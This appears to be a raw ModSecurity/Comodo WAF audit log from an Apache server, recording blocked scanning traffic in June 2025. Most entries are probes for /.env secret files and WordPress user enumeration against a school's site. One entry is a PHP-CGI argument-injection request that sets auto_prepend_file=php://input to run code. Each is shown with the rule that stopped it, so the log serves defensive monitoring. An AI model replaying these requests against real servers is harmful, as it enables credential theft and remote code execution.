[uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749756692252301 3266 (- - -) Stopwatch2: 1749756692252301 3266; combined=1397, p1=454, p2=906, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2327046-Z-- --3fbd7045-A-- [13/Jun/2025:02:52:11 +0700] aEsv68CW7vAFWQIjJpz6jAAAAEw 103.236.140.4 37830 103.236.140.4 8181 --3fbd7045-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --3fbd7045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fbd7045-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749757931451652 831 (- - -) Stopwatch2: 1749757931451652 831; combined=323, p1=286, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fbd7045-Z-- --40e8c836-A-- [13/Jun/2025:03:24:29 +0700] aEs3ff8ql0QLmijbYWaRgwAAAFc 103.236.140.4 38102 103.236.140.4 8181 --40e8c836-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 107.200.165.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 107.200.165.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40e8c836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40e8c836-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749759869093872 3445 (- - -) Stopwatch2: 1749759869093872 3445; combined=1437, p1=516, p2=892, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40e8c836-Z-- --b509c862-A-- [13/Jun/2025:03:29:19 +0700] aEs4n_8ql0QLmijbYWaRmwAAAEA 103.236.140.4 38158 103.236.140.4 8181 --b509c862-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.252.12.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.252.12.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b509c862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b509c862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749760159197053 3243 (- - -) Stopwatch2: 1749760159197053 3243; combined=1406, p1=542, p2=835, p3=0, p4=0, p5=29, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b509c862-Z-- --053f0444-A-- [13/Jun/2025:03:36:02 +0700] aEs6MsmhAKaFi0V9-ROmJAAAAMM 103.236.140.4 38198 103.236.140.4 8181 --053f0444-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.230.233.156 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.230.233.156 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --053f0444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --053f0444-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749760562703068 953 (- - -) Stopwatch2: 1749760562703068 953; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --053f0444-Z-- --8a86ee1b-A-- [13/Jun/2025:04:13:24 +0700] aEtC9P8ql0QLmijbYWaSPAAAAE4 103.236.140.4 38748 103.236.140.4 8181 --8a86ee1b-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POT-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --8a86ee1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a86ee1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749762804959956 901 (- - -) Stopwatch2: 1749762804959956 901; combined=409, p1=371, p2=0, p3=0, p4=0, p5=38, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a86ee1b-Z-- --1e274c1b-A-- [13/Jun/2025:04:13:46 +0700] aEtDCv8ql0QLmijbYWaSPgAAAE8 103.236.140.4 38752 103.236.140.4 8181 --1e274c1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36 Accept-Charset: utf-8 --1e274c1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e274c1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749762826665897 894 (- - -) Stopwatch2: 1749762826665897 894; combined=398, p1=360, p2=0, p3=0, p4=0, p5=38, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e274c1b-Z-- --8619170d-A-- [13/Jun/2025:04:44:22 +0700] aEtKNh1N9VxFJpQ5cVhLEQAAAIg 103.236.140.4 46100 103.236.140.4 8181 --8619170d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.43.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.43.94.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8619170d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8619170d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749764662591516 2890 (- - -) Stopwatch2: 1749764662591516 2890; combined=1296, p1=444, p2=823, p3=0, p4=0, p5=29, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8619170d-Z-- --af425400-A-- [13/Jun/2025:04:48:07 +0700] aEtLF8mhAKaFi0V9-ROoDAAAANY 103.236.140.4 46128 103.236.140.4 8181 --af425400-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.62.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.62.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --af425400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af425400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749764887959790 2489 (- - -) Stopwatch2: 1749764887959790 2489; combined=1183, p1=423, p2=734, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af425400-Z-- --332ef67e-A-- [13/Jun/2025:05:18:26 +0700] aEtSMsmhAKaFi0V9-ROoFgAAAMw 103.236.140.4 46290 103.236.140.4 8181 --332ef67e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Safari/537.36 Accept-Charset: utf-8 --332ef67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --332ef67e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749766706717396 856 (- - -) Stopwatch2: 1749766706717396 856; combined=333, p1=293, p2=0, p3=0, p4=0, p5=39, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --332ef67e-Z-- --7ee13a55-A-- [13/Jun/2025:05:18:27 +0700] aEtSM8mhAKaFi0V9-ROoFwAAAM4 103.236.140.4 46292 103.236.140.4 8181 --7ee13a55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.1 Accept-Charset: utf-8 --7ee13a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ee13a55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749766707344179 795 (- - -) Stopwatch2: 1749766707344179 795; combined=358, p1=323, p2=0, p3=0, p4=0, p5=35, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ee13a55-Z-- --2fca4971-A-- [13/Jun/2025:05:23:30 +0700] aEtTYh1N9VxFJpQ5cVhLIAAAAIo 103.236.140.4 46300 103.236.140.4 8181 --2fca4971-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.119.97.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.119.97.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2fca4971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fca4971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767010002640 2679 (- - -) Stopwatch2: 1749767010002640 2679; combined=1193, p1=381, p2=783, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fca4971-Z-- --a306a72f-A-- [13/Jun/2025:05:30:48 +0700] aEtVGMmhAKaFi0V9-ROoHQAAANU 103.236.140.4 46346 103.236.140.4 8181 --a306a72f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.82.150.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.82.150.86 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a306a72f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a306a72f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767448444521 3461 (- - -) Stopwatch2: 1749767448444521 3461; combined=1513, p1=516, p2=960, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a306a72f-Z-- --284b9d66-A-- [13/Jun/2025:05:32:32 +0700] aEtVgB1N9VxFJpQ5cVhLJgAAAJM 103.236.140.4 46378 103.236.140.4 8181 --284b9d66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.100.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.100.2 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --284b9d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --284b9d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749767552455999 863 (- - -) Stopwatch2: 1749767552455999 863; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --284b9d66-Z-- --12905d20-A-- [13/Jun/2025:05:39:42 +0700] aEtXLsmhAKaFi0V9-ROoLQAAANQ 103.236.140.4 46416 103.236.140.4 8181 --12905d20-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.236.76.100 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.236.76.100 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --12905d20-C-- --12905d20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12905d20-E-- --12905d20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767982693824 4372 (- - -) Stopwatch2: 1749767982693824 4372; combined=3046, p1=491, p2=2514, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12905d20-Z-- --7753954f-A-- [13/Jun/2025:06:21:34 +0700] aEtg_u9dCOerv4VGhqQezQAAABE 103.236.140.4 46680 103.236.140.4 8181 --7753954f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7753954f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7753954f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749770494250020 3313 (- - -) Stopwatch2: 1749770494250020 3313; combined=1388, p1=502, p2=856, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7753954f-Z-- --0c1b7d43-A-- [13/Jun/2025:06:48:55 +0700] aEtnZx1N9VxFJpQ5cVhQJgAAAIM 103.236.140.4 41842 103.236.140.4 8181 --0c1b7d43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.185.109.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.185.109.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c1b7d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c1b7d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749772135195685 3039 (- - -) Stopwatch2: 1749772135195685 3039; combined=1378, p1=447, p2=900, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c1b7d43-Z-- --ef09e63f-A-- [13/Jun/2025:07:01:59 +0700] aEtqd-9dCOerv4VGhqQsZQAAABE 103.236.140.4 40970 103.236.140.4 8181 --ef09e63f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 Accept-Charset: utf-8 --ef09e63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef09e63f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749772919115985 770 (- - -) Stopwatch2: 1749772919115985 770; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef09e63f-Z-- --cda3fb72-A-- [13/Jun/2025:07:08:15 +0700] aEtr7-9dCOerv4VGhqQwNwAAABY 103.236.140.4 55788 103.236.140.4 8181 --cda3fb72-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cda3fb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda3fb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id 